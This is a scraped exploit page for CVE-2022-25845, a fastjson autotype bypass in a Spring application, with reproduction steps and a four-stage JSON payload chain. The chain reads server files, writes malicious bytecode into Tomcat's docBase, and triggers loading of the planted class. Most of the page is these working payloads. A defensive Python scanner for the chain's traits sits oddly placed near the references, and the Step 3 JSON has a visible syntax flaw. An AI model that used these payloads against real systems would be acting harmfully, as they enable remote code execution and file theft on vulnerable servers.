## https://sploitus.com/exploit?id=307C3200-FE5B-5EB0-AA07-6048A1193D91
# CVE-2022-25845-In-Spring

# Main dependencies
1. jackson
2. commons-io

# Quick reproduction

1. Import the project into IntelliJ IDEA and build it with `mvn install`
2. Build and run the Dockerfile: `docker build .`
3. Run src/test/java/POC.java, which executes the `touch /tmp/pwned` command


# Exploit walkthrough

## Step 1: Add java.io.InputStream to the fastjson autotype cache

```json
{
  "a": "{    \"@type\": \"java.lang.Exception\",    \"@type\": \"com.fasterxml.jackson.core.exc.InputCoercionException\",    \"p\": {    }  }",
  "b": {
    "$ref": "$.a.a"
  },
  "c": "{  \"@type\": \"com.fasterxml.jackson.core.JsonParser\",  \"@type\": \"com.fasterxml.jackson.core.json.UTF8StreamJsonParser\",  \"in\": {}}",
  "d": {
    "$ref": "$.c.c"
  }
}
```

![Screenshot 2024-11-07 21.36.27](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.36.27.png)

## Step 2: Read /tmp through the file protocol to obtain the Tomcat docBase file name

> The content is read byte by byte

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.BOMInputStream",
    "delegate": {
      "@type": "org.apache.commons.io.input.BOMInputStream",
      "delegate": {
        "@type": "org.apache.commons.io.input.ReaderInputStream",
        "reader": {
          "@type": "jdk.nashorn.api.scripting.URLReader",
          "url": "${file}"
        },
        "charsetName": "UTF-8",
        "bufferSize": "1024"
      },
      "boms": [
        {
          "charsetName": "UTF-8",
          "bytes": ${data}
        }
      ]
    },
    "boms": [
      {
        "charsetName": "UTF-8",
        "bytes": [1]
      }
    ]
  },
  "b": {"$ref":"$.a.delegate"}
}
```

![Screenshot 2024-11-07 21.35.56](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.56.png)

## Step 3: Write the malicious bytecode into the docBase directory

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.AutoCloseInputStream",
    "in": {
      "@type": "org.apache.commons.io.input.TeeInputStream",
      "input": {
        "@type": "org.apache.commons.io.input.CharSequenceInputStream",
        "cs": {
          "@type": "java.lang.String"
          "${shellcode}",
          "charset": "iso-8859-1",
          "bufferSize": ${size}
        },
        "branch": {
          "@type": "org.apache.commons.io.output.WriterOutputStream",
          "writer": {
            "@type": "org.apache.commons.io.output.LockableFileWriter",
            "file": "${file2write}",
            "charset": "iso-8859-1",
            "append": true
          },
          "charset": "iso-8859-1",
          "bufferSize": 1024,
          "writeImmediately": true
        },
        "closeBranch": true
      }
    }
  },
  "b": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.ReaderInputStream",
    "reader": {
      "@type": "org.apache.commons.io.input.XmlStreamReader",
      "inputStream": {
        "$ref": "$.a"
      },
      "httpContentType": "text/xml",
      "lenient": false,
      "defaultEncoding": "iso-8859-1"
    },
    "charsetName": "iso-8859-1",
    "bufferSize": 1024
  },
  "c": {}
}
```

![Screenshot 2024-11-07 21.37.04](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.37.04.png)

## Step 4: Trigger loading of the malicious class

```json
{
  "@type":"java.lang.Exception",
  "@type":"com.chenzai.HackException"
}
```

![Screenshot 2024-11-07 21.35.32](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.32.png)

# References / Acknowledgements
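As a defensive counterpart to the four steps above, here is an added Python check (not part of this repository's PoC) that scans a JSON request body for the traits this chain relies on: duplicate `@type` keys in one object, a second JSON document hidden inside a string value (Step 1), `$ref` pointers between fields, and `@type` values naming the gadget classes used above. The class-prefix list and the sample payload are constructed from the payloads on this page; in a real deployment an allowlist of expected types (or fastjson's safe mode) is the stronger control.

```python
import json

# Constructed signatures: the gadget-class prefixes used in the chain above.
SUSPICIOUS_TYPE_PREFIXES = (
    "java.io.InputStream",
    "org.apache.commons.io.input.",
    "org.apache.commons.io.output.",
    "jdk.nashorn.api.scripting.URLReader",
    "com.fasterxml.jackson.core.",
)

class Obj(list):
    """JSON object kept as ordered (key, value) pairs so duplicate keys survive."""

def scan(value, path="$", findings=None):
    """Recursively collect autotype-related findings as (path, reason) tuples."""
    findings = [] if findings is None else findings
    if isinstance(value, Obj):
        if [k for k, _ in value].count("@type") > 1:
            findings.append((path, "duplicate @type keys"))
        for key, child in value:
            if key == "@type" and isinstance(child, str) \
                    and child.startswith(SUSPICIOUS_TYPE_PREFIXES):
                findings.append((path, "suspicious @type " + child))
            elif key == "$ref":
                findings.append((path, "$ref to " + str(child)))
            scan(child, path + "." + key, findings)
    elif isinstance(value, list):
        for i, child in enumerate(value):
            scan(child, "%s[%d]" % (path, i), findings)
    elif isinstance(value, str) and value.lstrip().startswith("{"):
        # Step 1 hides a second JSON document inside a string field, so
        # string values that look like objects are decoded and scanned too.
        try:
            inner = json.loads(value, object_pairs_hook=Obj)
        except ValueError:
            return findings
        findings.append((path, "nested JSON document in string"))
        scan(inner, path + "(nested)", findings)
    return findings

def scan_body(body):
    """Scan a raw request body; returns the list of findings (empty = clean)."""
    return scan(json.loads(body, object_pairs_hook=Obj))

# Constructed sample with the shape of the Step 1 payload above.
STEP1_SAMPLE = r'''{
  "a": "{ \"@type\": \"java.lang.Exception\", \"@type\": \"com.fasterxml.jackson.core.exc.InputCoercionException\", \"p\": {} }",
  "b": {"$ref": "$.a.a"}
}'''
```

`scan_body(STEP1_SAMPLE)` reports the nested document, the duplicate `@type`, the jackson gadget type and the `$ref`, while an ordinary body produces no findings.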

- [GeekCon 2024](https://www.geekcon.top/js/pdfjs/web/viewer.html?file=/doc/ppt/GC24_SpringBoot之殇.pdf)
- jsjcw